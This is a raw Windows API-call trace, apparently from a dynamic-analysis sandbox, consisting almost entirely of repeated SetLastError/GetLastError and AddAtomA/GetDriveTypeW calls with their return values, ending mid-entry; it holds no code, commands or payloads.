[0115.699] SetLastError (dwErrCode=0x0) [0115.699] GetLastError () returned 0x0 [0115.699] SetLastError (dwErrCode=0x0) [0115.699] GetLastError () returned 0x0 [0115.699] SetLastError (dwErrCode=0x0) [0115.699] GetLastError () returned 0x0 [0115.699] SetLastError (dwErrCode=0x0) [0115.699] GetLastError () returned 0x0 [0115.699] SetLastError (dwErrCode=0x0) [0115.699] GetLastError () returned 0x0 [0115.699] SetLastError (dwErrCode=0x0) [0115.699] GetLastError () returned 0x0 [0115.699] SetLastError (dwErrCode=0x0) [0115.699] GetLastError () returned 0x0 [0115.699] SetLastError 
(dwErrCode=0x0) [0115.699] GetLastError () returned 0x0 [0115.699] SetLastError (dwErrCode=0x0) [0115.699] GetLastError () returned 0x0 [0115.699] SetLastError (dwErrCode=0x0) [0115.699] GetLastError () returned 0x0 [0115.699] SetLastError (dwErrCode=0x0) [0115.699] GetLastError () returned 0x0 [0115.699] SetLastError (dwErrCode=0x0) [0115.699] GetLastError () returned 0x0 [0115.700] SetLastError (dwErrCode=0x0) [0115.700] GetLastError () returned 0x0 [0115.700] SetLastError (dwErrCode=0x0) [0115.700] GetLastError () returned 0x0 [0115.700] SetLastError (dwErrCode=0x0) [0115.700] GetLastError () returned 0x0 [0115.700] SetLastError (dwErrCode=0x0) [0115.700] GetLastError () returned 0x0 [0115.700] SetLastError (dwErrCode=0x0) [0115.700] GetLastError () returned 0x0 [0115.700] SetLastError (dwErrCode=0x0) [0115.700] GetLastError () returned 0x0 [0115.700] SetLastError (dwErrCode=0x0) [0115.700] GetLastError () returned 0x0 [0115.700] SetLastError (dwErrCode=0x0) [0115.700] GetLastError () returned 0x0 [0115.700] SetLastError (dwErrCode=0x0) [0115.700] GetLastError () returned 0x0 [0115.700] SetLastError (dwErrCode=0x0) [0115.700] GetLastError () returned 0x0 [0115.700] SetLastError (dwErrCode=0x0) [0115.700] GetLastError () returned 0x0 [0115.700] SetLastError (dwErrCode=0x0) [0115.700] GetLastError () returned 0x0 [0115.700] SetLastError (dwErrCode=0x0) [0115.700] GetLastError () returned 0x0 [0115.700] SetLastError (dwErrCode=0x0) [0115.700] GetLastError () returned 0x0 [0115.701] SetLastError (dwErrCode=0x0) [0115.701] GetLastError () returned 0x0 [0115.701] SetLastError (dwErrCode=0x0) [0115.701] GetLastError () returned 0x0 [0115.701] SetLastError (dwErrCode=0x0) [0115.701] GetLastError () returned 0x0 [0115.701] SetLastError (dwErrCode=0x0) [0115.701] GetLastError () returned 0x0 [0115.701] SetLastError (dwErrCode=0x0) [0115.701] GetLastError () returned 0x0 [0115.701] SetLastError (dwErrCode=0x0) [0115.701] GetLastError () returned 0x0 [0115.701] SetLastError 
(dwErrCode=0x0) [0115.701] GetLastError () returned 0x0 [0115.701] SetLastError (dwErrCode=0x0) [0115.701] GetLastError () returned 0x0 [0115.701] SetLastError (dwErrCode=0x0) [0115.701] GetLastError () returned 0x0 [0115.701] SetLastError (dwErrCode=0x0) [0115.701] GetLastError () returned 0x0 [0115.701] SetLastError (dwErrCode=0x0) [0115.701] GetLastError () returned 0x0 [0115.701] SetLastError (dwErrCode=0x0) [0115.701] GetLastError () returned 0x0 [0115.701] SetLastError (dwErrCode=0x0) [0115.701] GetLastError () returned 0x0 [0115.701] SetLastError (dwErrCode=0x0) [0115.701] GetLastError () returned 0x0 [0115.702] SetLastError (dwErrCode=0x0) [0115.702] GetLastError () returned 0x0 [0115.702] SetLastError (dwErrCode=0x0) [0115.702] GetLastError () returned 0x0 [0115.702] SetLastError (dwErrCode=0x0) [0115.702] GetLastError () returned 0x0 [0115.702] SetLastError (dwErrCode=0x0) [0115.702] GetLastError () returned 0x0 [0115.702] SetLastError (dwErrCode=0x0) [0115.702] GetLastError () returned 0x0 [0115.702] SetLastError (dwErrCode=0x0) [0115.702] GetLastError () returned 0x0 [0115.702] SetLastError (dwErrCode=0x0) [0115.702] GetLastError () returned 0x0 [0115.702] SetLastError (dwErrCode=0x0) [0115.702] GetLastError () returned 0x0 [0115.702] SetLastError (dwErrCode=0x0) [0115.702] GetLastError () returned 0x0 [0115.702] SetLastError (dwErrCode=0x0) [0115.702] GetLastError () returned 0x0 [0115.702] SetLastError (dwErrCode=0x0) [0115.702] GetLastError () returned 0x0 [0115.702] SetLastError (dwErrCode=0x0) [0115.702] GetLastError () returned 0x0 [0115.702] SetLastError (dwErrCode=0x0) [0115.702] GetLastError () returned 0x0 [0115.702] SetLastError (dwErrCode=0x0) [0115.702] GetLastError () returned 0x0 [0115.703] SetLastError (dwErrCode=0x0) [0115.703] GetLastError () returned 0x0 [0115.703] SetLastError (dwErrCode=0x0) [0115.703] GetLastError () returned 0x0 [0115.703] SetLastError (dwErrCode=0x0) [0115.703] GetLastError () returned 0x0 [0115.703] SetLastError 
(dwErrCode=0x0) [0115.703] GetLastError () returned 0x0 [0115.703] SetLastError (dwErrCode=0x0) [0115.703] GetLastError () returned 0x0 [0115.703] SetLastError (dwErrCode=0x0) [0115.703] GetLastError () returned 0x0 [0115.703] SetLastError (dwErrCode=0x0) [0115.703] GetLastError () returned 0x0 [0115.703] SetLastError (dwErrCode=0x0) [0115.703] GetLastError () returned 0x0 [0115.703] SetLastError (dwErrCode=0x0) [0115.703] GetLastError () returned 0x0 [0115.703] SetLastError (dwErrCode=0x0) [0115.703] GetLastError () returned 0x0 [0115.703] SetLastError (dwErrCode=0x0) [0115.703] GetLastError () returned 0x0 [0115.703] SetLastError (dwErrCode=0x0) [0115.703] GetLastError () returned 0x0 [0115.703] SetLastError (dwErrCode=0x0) [0115.703] GetLastError () returned 0x0 [0115.703] SetLastError (dwErrCode=0x0) [0115.704] GetLastError () returned 0x0 [0115.704] SetLastError (dwErrCode=0x0) [0115.704] GetLastError () returned 0x0 [0115.704] SetLastError (dwErrCode=0x0) [0115.704] GetLastError () returned 0x0 [0115.704] SetLastError (dwErrCode=0x0) [0115.704] GetLastError () returned 0x0 [0115.704] SetLastError (dwErrCode=0x0) [0115.704] GetLastError () returned 0x0 [0115.704] SetLastError (dwErrCode=0x0) [0115.704] GetLastError () returned 0x0 [0115.704] SetLastError (dwErrCode=0x0) [0115.704] GetLastError () returned 0x0 [0115.704] SetLastError (dwErrCode=0x0) [0115.704] GetLastError () returned 0x0 [0115.704] SetLastError (dwErrCode=0x0) [0115.704] GetLastError () returned 0x0 [0115.704] SetLastError (dwErrCode=0x0) [0115.704] GetLastError () returned 0x0 [0115.704] SetLastError (dwErrCode=0x0) [0115.704] GetLastError () returned 0x0 [0115.704] SetLastError (dwErrCode=0x0) [0115.704] GetLastError () returned 0x0 [0115.704] SetLastError (dwErrCode=0x0) [0115.704] GetLastError () returned 0x0 [0115.704] SetLastError (dwErrCode=0x0) [0115.704] GetLastError () returned 0x0 [0115.705] SetLastError (dwErrCode=0x0) [0115.705] GetLastError () returned 0x0 [0115.705] SetLastError 
(dwErrCode=0x0) [0115.705] GetLastError () returned 0x0 [0115.705] SetLastError (dwErrCode=0x0) [0115.705] GetLastError () returned 0x0 [0115.705] SetLastError (dwErrCode=0x0) [0115.705] GetLastError () returned 0x0 [0115.705] SetLastError (dwErrCode=0x0) [0115.705] GetLastError () returned 0x0 [0115.705] SetLastError (dwErrCode=0x0) [0115.705] GetLastError () returned 0x0 [0115.705] SetLastError (dwErrCode=0x0) [0115.705] GetLastError () returned 0x0 [0115.705] SetLastError (dwErrCode=0x0) [0115.705] GetLastError () returned 0x0 [0115.705] SetLastError (dwErrCode=0x0) [0115.705] GetLastError () returned 0x0 [0115.705] SetLastError (dwErrCode=0x0) [0115.705] GetLastError () returned 0x0 [0115.705] SetLastError (dwErrCode=0x0) [0115.705] GetLastError () returned 0x0 [0115.706] SetLastError (dwErrCode=0x0) [0115.706] GetLastError () returned 0x0 [0115.706] SetLastError (dwErrCode=0x0) [0115.706] GetLastError () returned 0x0 [0115.706] SetLastError (dwErrCode=0x0) [0115.706] GetLastError () returned 0x0 [0115.706] SetLastError (dwErrCode=0x0) [0115.706] GetLastError () returned 0x0 [0115.706] SetLastError (dwErrCode=0x0) [0115.706] GetLastError () returned 0x0 [0115.706] SetLastError (dwErrCode=0x0) [0115.706] GetLastError () returned 0x0 [0115.706] SetLastError (dwErrCode=0x0) [0115.706] GetLastError () returned 0x0 [0115.706] SetLastError (dwErrCode=0x0) [0115.706] GetLastError () returned 0x0 [0115.706] SetLastError (dwErrCode=0x0) [0115.706] GetLastError () returned 0x0 [0115.706] SetLastError (dwErrCode=0x0) [0115.706] GetLastError () returned 0x0 [0115.706] SetLastError (dwErrCode=0x0) [0115.706] GetLastError () returned 0x0 [0115.706] SetLastError (dwErrCode=0x0) [0115.706] GetLastError () returned 0x0 [0115.707] SetLastError (dwErrCode=0x0) [0115.707] GetLastError () returned 0x0 [0115.707] SetLastError (dwErrCode=0x0) [0115.707] GetLastError () returned 0x0 [0115.707] SetLastError (dwErrCode=0x0) [0115.707] GetLastError () returned 0x0 [0115.707] SetLastError 
(dwErrCode=0x0) [0115.707] GetLastError () returned 0x0 [0115.707] SetLastError (dwErrCode=0x0) [0115.707] GetLastError () returned 0x0 [0115.707] SetLastError (dwErrCode=0x0) [0115.707] GetLastError () returned 0x0 [0115.707] SetLastError (dwErrCode=0x0) [0115.707] GetLastError () returned 0x0 [0115.707] SetLastError (dwErrCode=0x0) [0115.707] GetLastError () returned 0x0 [0115.707] SetLastError (dwErrCode=0x0) [0115.707] GetLastError () returned 0x0 [0115.707] SetLastError (dwErrCode=0x0) [0115.707] GetLastError () returned 0x0 [0115.707] SetLastError (dwErrCode=0x0) [0115.707] GetLastError () returned 0x0 [0115.708] SetLastError (dwErrCode=0x0) [0115.708] GetLastError () returned 0x0 [0115.708] SetLastError (dwErrCode=0x0) [0115.708] GetLastError () returned 0x0 [0115.708] SetLastError (dwErrCode=0x0) [0115.708] GetLastError () returned 0x0 [0115.708] SetLastError (dwErrCode=0x0) [0115.708] GetLastError () returned 0x0 [0115.708] SetLastError (dwErrCode=0x0) [0115.708] GetLastError () returned 0x0 [0115.708] SetLastError (dwErrCode=0x0) [0115.708] GetLastError () returned 0x0 [0115.708] SetLastError (dwErrCode=0x0) [0115.708] GetLastError () returned 0x0 [0115.708] SetLastError (dwErrCode=0x0) [0115.708] GetLastError () returned 0x0 [0115.708] SetLastError (dwErrCode=0x0) [0115.708] GetLastError () returned 0x0 [0115.708] SetLastError (dwErrCode=0x0) [0115.708] GetLastError () returned 0x0 [0115.708] SetLastError (dwErrCode=0x0) [0115.708] GetLastError () returned 0x0 [0115.708] SetLastError (dwErrCode=0x0) [0115.709] GetLastError () returned 0x0 [0115.709] SetLastError (dwErrCode=0x0) [0115.709] GetLastError () returned 0x0 [0115.709] SetLastError (dwErrCode=0x0) [0115.709] GetLastError () returned 0x0 [0115.709] SetLastError (dwErrCode=0x0) [0115.709] GetLastError () returned 0x0 [0115.709] SetLastError (dwErrCode=0x0) [0115.709] GetLastError () returned 0x0 [0115.709] SetLastError (dwErrCode=0x0) [0115.709] GetLastError () returned 0x0 [0115.709] SetLastError 
(dwErrCode=0x0) [0115.709] GetLastError () returned 0x0 [0115.709] SetLastError (dwErrCode=0x0) [0115.709] GetLastError () returned 0x0 [0115.709] SetLastError (dwErrCode=0x0) [0115.709] GetLastError () returned 0x0 [0115.709] SetLastError (dwErrCode=0x0) [0115.709] GetLastError () returned 0x0 [0115.709] SetLastError (dwErrCode=0x0) [0115.709] GetLastError () returned 0x0 [0115.709] SetLastError (dwErrCode=0x0) [0115.709] GetLastError () returned 0x0 [0115.710] SetLastError (dwErrCode=0x0) [0115.710] GetLastError () returned 0x0 [0115.710] SetLastError (dwErrCode=0x0) [0115.710] GetLastError () returned 0x0 [0115.710] SetLastError (dwErrCode=0x0) [0115.710] GetLastError () returned 0x0 [0115.710] SetLastError (dwErrCode=0x0) [0115.710] GetLastError () returned 0x0 [0115.710] SetLastError (dwErrCode=0x0) [0115.710] GetLastError () returned 0x0 [0115.710] SetLastError (dwErrCode=0x0) [0115.710] GetLastError () returned 0x0 [0115.710] SetLastError (dwErrCode=0x0) [0115.710] GetLastError () returned 0x0 [0115.710] SetLastError (dwErrCode=0x0) [0115.710] GetLastError () returned 0x0 [0115.710] SetLastError (dwErrCode=0x0) [0115.710] GetLastError () returned 0x0 [0115.710] SetLastError (dwErrCode=0x0) [0115.710] GetLastError () returned 0x0 [0115.710] SetLastError (dwErrCode=0x0) [0115.710] GetLastError () returned 0x0 [0115.710] SetLastError (dwErrCode=0x0) [0115.711] GetLastError () returned 0x0 [0115.711] SetLastError (dwErrCode=0x0) [0115.711] GetLastError () returned 0x0 [0115.711] SetLastError (dwErrCode=0x0) [0115.711] GetLastError () returned 0x0 [0115.711] SetLastError (dwErrCode=0x0) [0115.711] GetLastError () returned 0x0 [0115.711] SetLastError (dwErrCode=0x0) [0115.711] GetLastError () returned 0x0 [0115.711] SetLastError (dwErrCode=0x0) [0115.711] GetLastError () returned 0x0 [0115.711] SetLastError (dwErrCode=0x0) [0115.711] GetLastError () returned 0x0 [0115.711] SetLastError (dwErrCode=0x0) [0115.711] GetLastError () returned 0x0 [0115.711] SetLastError 
(dwErrCode=0x0) [0115.711] GetLastError () returned 0x0 [0115.711] SetLastError (dwErrCode=0x0) [0115.711] GetLastError () returned 0x0 [0115.711] SetLastError (dwErrCode=0x0) [0115.711] GetLastError () returned 0x0 [0115.711] SetLastError (dwErrCode=0x0) [0115.711] GetLastError () returned 0x0 [0115.711] SetLastError (dwErrCode=0x0) [0115.711] GetLastError () returned 0x0 [0115.711] SetLastError (dwErrCode=0x0) [0115.711] GetLastError () returned 0x0 [0115.712] SetLastError (dwErrCode=0x0) [0115.712] GetLastError () returned 0x0 [0115.712] SetLastError (dwErrCode=0x0) [0115.712] GetLastError () returned 0x0 [0115.712] SetLastError (dwErrCode=0x0) [0115.712] GetLastError () returned 0x0 [0115.712] SetLastError (dwErrCode=0x0) [0115.712] GetLastError () returned 0x0 [0115.712] SetLastError (dwErrCode=0x0) [0115.712] GetLastError () returned 0x0 [0115.712] SetLastError (dwErrCode=0x0) [0115.712] GetLastError () returned 0x0 [0115.712] SetLastError (dwErrCode=0x0) [0115.712] GetLastError () returned 0x0 [0115.712] SetLastError (dwErrCode=0x0) [0115.712] GetLastError () returned 0x0 [0115.712] SetLastError (dwErrCode=0x0) [0115.712] GetLastError () returned 0x0 [0115.712] SetLastError (dwErrCode=0x0) [0115.712] GetLastError () returned 0x0 [0115.712] SetLastError (dwErrCode=0x0) [0115.712] GetLastError () returned 0x0 [0115.712] SetLastError (dwErrCode=0x0) [0115.712] GetLastError () returned 0x0 [0115.712] SetLastError (dwErrCode=0x0) [0115.712] GetLastError () returned 0x0 [0115.712] SetLastError (dwErrCode=0x0) [0115.712] GetLastError () returned 0x0 [0115.712] SetLastError (dwErrCode=0x0) [0115.712] GetLastError () returned 0x0 [0115.712] SetLastError (dwErrCode=0x0) [0115.713] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0115.713] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404966) returned 0x0 [0115.714] AddAtomA (lpString=0x0) returned 0x0 [0115.714] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.714] AddAtomA (lpString=0x0) 
returned 0x0 [0115.714] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.714] AddAtomA (lpString=0x0) returned 0x0 [0115.714] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.714] AddAtomA (lpString=0x0) returned 0x0 [0115.714] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.714] AddAtomA (lpString=0x0) returned 0x0 [0115.714] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.765] AddAtomA (lpString=0x0) returned 0x0 [0115.765] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.765] AddAtomA (lpString=0x0) returned 0x0 [0115.765] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.765] AddAtomA (lpString=0x0) returned 0x0 [0115.765] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.765] AddAtomA (lpString=0x0) returned 0x0 [0115.765] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.765] AddAtomA (lpString=0x0) returned 0x0 [0115.765] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.765] AddAtomA (lpString=0x0) returned 0x0 [0115.765] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.765] AddAtomA (lpString=0x0) returned 0x0 [0115.765] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.765] AddAtomA (lpString=0x0) returned 0x0 [0115.765] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.766] AddAtomA (lpString=0x0) returned 0x0 [0115.766] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.766] AddAtomA (lpString=0x0) returned 0x0 [0115.766] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.766] AddAtomA (lpString=0x0) returned 0x0 [0115.766] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.766] AddAtomA (lpString=0x0) returned 0x0 [0115.766] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.766] AddAtomA (lpString=0x0) returned 0x0 [0115.766] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.766] AddAtomA (lpString=0x0) returned 0x0 [0115.766] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.766] AddAtomA (lpString=0x0) returned 0x0 [0115.766] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0115.766] AddAtomA (lpString=0x0) returned 0x0 [0115.766] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.766] AddAtomA (lpString=0x0) returned 0x0 [0115.766] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.766] AddAtomA (lpString=0x0) returned 0x0 [0115.766] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.766] AddAtomA (lpString=0x0) returned 0x0 [0115.766] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.766] AddAtomA (lpString=0x0) returned 0x0 [0115.766] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.766] AddAtomA (lpString=0x0) returned 0x0 [0115.766] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.766] AddAtomA (lpString=0x0) returned 0x0 [0115.766] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.766] AddAtomA (lpString=0x0) returned 0x0 [0115.766] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.766] AddAtomA (lpString=0x0) returned 0x0 [0115.766] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.766] AddAtomA (lpString=0x0) returned 0x0 [0115.766] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.766] AddAtomA (lpString=0x0) returned 0x0 [0115.766] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.766] AddAtomA (lpString=0x0) returned 0x0 [0115.766] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.767] AddAtomA (lpString=0x0) returned 0x0 [0115.767] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.767] AddAtomA (lpString=0x0) returned 0x0 [0115.767] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.767] AddAtomA (lpString=0x0) returned 0x0 [0115.767] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.767] AddAtomA (lpString=0x0) returned 0x0 [0115.767] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.767] AddAtomA (lpString=0x0) returned 0x0 [0115.767] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.767] AddAtomA (lpString=0x0) returned 0x0 [0115.767] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.767] AddAtomA (lpString=0x0) returned 0x0 [0115.767] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0115.767] AddAtomA (lpString=0x0) returned 0x0 [0115.767] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.767] AddAtomA (lpString=0x0) returned 0x0 [0115.767] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.767] AddAtomA (lpString=0x0) returned 0x0 [0115.767] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.767] AddAtomA (lpString=0x0) returned 0x0 [0115.767] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.767] AddAtomA (lpString=0x0) returned 0x0 [0115.767] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.767] AddAtomA (lpString=0x0) returned 0x0 [0115.767] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.767] AddAtomA (lpString=0x0) returned 0x0 [0115.767] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.767] AddAtomA (lpString=0x0) returned 0x0 [0115.767] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.767] AddAtomA (lpString=0x0) returned 0x0 [0115.767] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.767] AddAtomA (lpString=0x0) returned 0x0 [0115.767] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.767] AddAtomA (lpString=0x0) returned 0x0 [0115.767] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.767] AddAtomA (lpString=0x0) returned 0x0 [0115.767] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.768] AddAtomA (lpString=0x0) returned 0x0 [0115.768] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.768] AddAtomA (lpString=0x0) returned 0x0 [0115.768] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.768] AddAtomA (lpString=0x0) returned 0x0 [0115.768] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.768] AddAtomA (lpString=0x0) returned 0x0 [0115.768] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.768] AddAtomA (lpString=0x0) returned 0x0 [0115.768] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.768] AddAtomA (lpString=0x0) returned 0x0 [0115.768] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.768] AddAtomA (lpString=0x0) 
returned 0x0 [0115.768] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.768] AddAtomA (lpString=0x0) returned 0x0 [0115.768] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.768] AddAtomA (lpString=0x0) returned 0x0 [0115.768] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.768] AddAtomA (lpString=0x0) returned 0x0 [0115.768] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.768] AddAtomA (lpString=0x0) returned 0x0 [0115.768] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.768] AddAtomA (lpString=0x0) returned 0x0 [0115.768] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.768] AddAtomA (lpString=0x0) returned 0x0 [0115.768] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.768] AddAtomA (lpString=0x0) returned 0x0 [0115.768] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.768] AddAtomA (lpString=0x0) returned 0x0 [0115.768] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.768] AddAtomA (lpString=0x0) returned 0x0 [0115.768] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.768] AddAtomA (lpString=0x0) returned 0x0 [0115.768] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.768] AddAtomA (lpString=0x0) returned 0x0 [0115.768] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.768] AddAtomA (lpString=0x0) returned 0x0 [0115.768] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.769] AddAtomA (lpString=0x0) returned 0x0 [0115.769] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.769] AddAtomA (lpString=0x0) returned 0x0 [0115.769] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.769] AddAtomA (lpString=0x0) returned 0x0 [0115.769] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.769] AddAtomA (lpString=0x0) returned 0x0 [0115.769] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.769] AddAtomA (lpString=0x0) returned 0x0 [0115.769] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.769] AddAtomA (lpString=0x0) returned 0x0 [0115.769] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0115.769] AddAtomA (lpString=0x0) returned 0x0 [0115.769] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.769] AddAtomA (lpString=0x0) returned 0x0 [0115.769] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.769] AddAtomA (lpString=0x0) returned 0x0 [0115.769] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.769] AddAtomA (lpString=0x0) returned 0x0 [0115.769] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.769] AddAtomA (lpString=0x0) returned 0x0 [0115.769] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.769] AddAtomA (lpString=0x0) returned 0x0 [0115.769] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.769] AddAtomA (lpString=0x0) returned 0x0 [0115.769] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.769] AddAtomA (lpString=0x0) returned 0x0 [0115.769] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.769] AddAtomA (lpString=0x0) returned 0x0 [0115.769] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.769] AddAtomA (lpString=0x0) returned 0x0 [0115.769] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.769] AddAtomA (lpString=0x0) returned 0x0 [0115.769] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.769] AddAtomA (lpString=0x0) returned 0x0 [0115.769] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.769] AddAtomA (lpString=0x0) returned 0x0 [0115.769] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.770] AddAtomA (lpString=0x0) returned 0x0 [0115.770] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.770] AddAtomA (lpString=0x0) returned 0x0 [0115.770] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.770] AddAtomA (lpString=0x0) returned 0x0 [0115.770] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.770] AddAtomA (lpString=0x0) returned 0x0 [0115.770] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.770] AddAtomA (lpString=0x0) returned 0x0 [0115.770] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.770] AddAtomA (lpString=0x0) returned 0x0 [0115.770] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0115.770] AddAtomA (lpString=0x0) returned 0x0 [0115.770] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.770] AddAtomA (lpString=0x0) returned 0x0 [0115.770] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.770] AddAtomA (lpString=0x0) returned 0x0 [0115.770] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.770] AddAtomA (lpString=0x0) returned 0x0 [0115.770] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.770] AddAtomA (lpString=0x0) returned 0x0 [0115.770] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.770] AddAtomA (lpString=0x0) returned 0x0 [0115.770] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.770] AddAtomA (lpString=0x0) returned 0x0 [0115.770] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.770] AddAtomA (lpString=0x0) returned 0x0 [0115.770] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.770] AddAtomA (lpString=0x0) returned 0x0 [0115.770] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.770] AddAtomA (lpString=0x0) returned 0x0 [0115.770] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.770] AddAtomA (lpString=0x0) returned 0x0 [0115.770] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.770] AddAtomA (lpString=0x0) returned 0x0 [0115.770] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.770] AddAtomA (lpString=0x0) returned 0x0 [0115.770] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.771] AddAtomA (lpString=0x0) returned 0x0 [0115.771] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.771] AddAtomA (lpString=0x0) returned 0x0 [0115.771] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.771] AddAtomA (lpString=0x0) returned 0x0 [0115.771] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.771] AddAtomA (lpString=0x0) returned 0x0 [0115.771] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.771] AddAtomA (lpString=0x0) returned 0x0 [0115.771] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.771] AddAtomA (lpString=0x0) 
